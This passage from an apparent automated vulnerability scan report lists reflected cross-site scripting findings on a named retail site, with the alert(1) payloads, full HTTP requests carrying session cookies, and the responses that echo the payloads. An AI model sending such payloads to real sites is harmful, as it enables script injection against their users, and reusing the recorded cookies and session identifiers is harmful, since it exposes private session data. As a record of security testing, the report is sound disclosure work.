ointsPotentialFormatted);$("#hfComparisonChartSkuId").get(0).value=skuid;$("#hfComparisonReturnUrl").get(0).value="http://www.ebags.com:80/product/case-logic/sony-psp-game-case/120830?productid=1312640df556"-alert(1)-"271370c27cf&sourceid=become01$couponid&quicksignlink=pageendproductid="+skuid;});(function($,eBags){var txtPostalCode=$("#txtPostalCode"),divEddResult=$("#divEddResult"),divEddError=$("#divEddError"),divEddProces
...[SNIP]...

1.16. http://www.ebags.com/products/index.cfm [quicksignlink parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /products/index.cfm

Issue detail

The value of the quicksignlink request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66c59"-alert(1)-"b92aab12d9e was submitted in the quicksignlink parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/index.cfm?modelid=120830&productid=1312640&sourceid=become01$couponid=40959822&quicksignlink=pageend66c59"-alert(1)-"b92aab12d9e HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:19:52 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID; expires=Sun, 02-Jan-2011 14:19:52 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 76670


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h
...[SNIP]...
omparisonChartSkuId").get(0).value=skuid;$("#hfComparisonReturnUrl").get(0).value="http://www.ebags.com:80/product/case-logic/sony-psp-game-case/120830?&sourceid=become01$couponid&quicksignlink=pageend66c59"-alert(1)-"b92aab12d9eproductid="+skuid;});(function($,eBags){var txtPostalCode=$("#txtPostalCode"),divEddResult=$("#divEddResult"),divEddError=$("#divEddError"),divEddProcessing=$("#divEddProcessing")
doneProcessing=false,
...[SNIP]...

1.17. http://www.ebags.com/products/index.cfm [sourceid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /products/index.cfm

Issue detail

The value of the sourceid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b45c"-alert(1)-"c334fb69c0b was submitted in the sourceid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/index.cfm?modelid=120830&productid=1312640&sourceid=6b45c"-alert(1)-"c334fb69c0b&quicksignlink=pageend HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:19:01 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=6B45C%2DALERT%281%29%2DC334FB69C0B; expires=Sun, 02-Jan-2011 14:19:01 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 76507


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h
...[SNIP]...
ewardsPointsPotentialFormatted);$("#hfComparisonChartSkuId").get(0).value=skuid;$("#hfComparisonReturnUrl").get(0).value="http://www.ebags.com:80/product/case-logic/sony-psp-game-case/120830?&sourceid=6b45c"-alert(1)-"c334fb69c0b&quicksignlink=pageendproductid="+skuid;});(function($,eBags){var txtPostalCode=$("#txtPostalCode"),divEddResult=$("#divEddResult"),divEddError=$("#divEddError"),divEddProcessing=$("#divEddProcessing")
...[SNIP]...

1.18. http://www.ebags.com/rewards/index.cfm [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /rewards/index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1662e"><script>alert(1)</script>ec126fb878a was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rewards/index.cfm?fuseaction=signup1662e"><script>alert(1)</script>ec126fb878a HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:04:10 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:04:10 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 41844


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/rewards/index.cfm?fuseaction=signup1662e"><script>alert(1)</script>ec126fb878a&quicksignlink=pageend">
...[SNIP]...

1.19. http://www.ebags.com/rewards/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /rewards/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fcea"><script>alert(1)</script>afebb6ca52d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rewards/index.cfm?fuseaction=signup&2fcea"><script>alert(1)</script>afebb6ca52d=1 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:04:18 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:04:18 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 43617


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/rewards/index.cfm?fuseaction=signup&2fcea"><script>alert(1)</script>afebb6ca52d=1&quicksignlink=pageend">
...[SNIP]...

1.20. http://www.ebags.com/shoppingcart/index.cfm [CurrentTime parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /shoppingcart/index.cfm

Issue detail

The value of the CurrentTime request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e128e"><script>alert(1)</script>f1c52c95efe was submitted in the CurrentTime parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=%7Bts%20%272010%2D12%2D26%2006%3A55%3A59%27%7De128e"><script>alert(1)</script>f1c52c95efe&requesttimeout=2000 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:06:56 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:06:56 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 64284


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=%7Bts%20%272010%2D12%2D26%2006%3A55%3A59%27%7De128e"><script>alert(1)</script>f1c52c95efe&requesttimeout=2000&quicksignlink=pageend">
...[SNIP]...

1.21. http://www.ebags.com/shoppingcart/index.cfm [itemAdded parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /shoppingcart/index.cfm

Issue detail

The value of the itemAdded request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab4aa"><script>alert(1)</script>2ba5ea7583c was submitted in the itemAdded parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=12%2f26%2f2010+6%3a55%3a59+AM&requesttimeout=9000&itemAdded=trueab4aa"><script>alert(1)</script>2ba5ea7583c HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:56 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:56 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 64276


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=12%2f26%2f2010+6%3a55%3a59+AM&requesttimeout=9000&itemAdded=trueab4aa"><script>alert(1)</script>2ba5ea7583c&quicksignlink=pageend">
...[SNIP]...

1.22. http://www.ebags.com/shoppingcart/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /shoppingcart/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bc9a"><script>alert(1)</script>8aebec06550 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shoppingcart/index.cfm?5bc9a"><script>alert(1)</script>8aebec06550=1 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:06:37 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:06:37 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 64074


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/shoppingcart/index.cfm?5bc9a"><script>alert(1)</script>8aebec06550=1&quicksignlink=pageend">
...[SNIP]...

1.23. http://www.ebags.com/shoppingcart/index.cfm [requesttimeout parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /shoppingcart/index.cfm

Issue detail

The value of the requesttimeout request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67a7a"><script>alert(1)</script>17ddeba4e9b was submitted in the requesttimeout parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=%7Bts%20%272010%2D12%2D26%2006%3A55%3A59%27%7D&requesttimeout=200067a7a"><script>alert(1)</script>17ddeba4e9b HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:15 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:15 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 64284


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=%7Bts%20%272010%2D12%2D26%2006%3A55%3A59%27%7D&requesttimeout=200067a7a"><script>alert(1)</script>17ddeba4e9b&quicksignlink=pageend">
...[SNIP]...

1.24. http://www.ebags.com/ [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 837d1'%3balert(1)//1c7ecab77cc was submitted in the SPLITSESSION cookie. This input was echoed as 837d1';alert(1)//1c7ecab77cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C837d1'%3balert(1)//1c7ecab77cc; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:03:57 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:03:57 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 74992


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|837d1';alert(1)//1c7ecab77cc');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.25. http://www.ebags.com/blocks/dsp_non_discountable_brands.cfm [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /blocks/dsp_non_discountable_brands.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload feaa6'%3balert(1)//78f8edd5719 was submitted in the SPLITSESSION cookie. This input was echoed as feaa6';alert(1)//78f8edd5719 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blocks/dsp_non_discountable_brands.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cfeaa6'%3balert(1)//78f8edd5719; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:03:13 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Set-Cookie: ACCT=guest; path=/
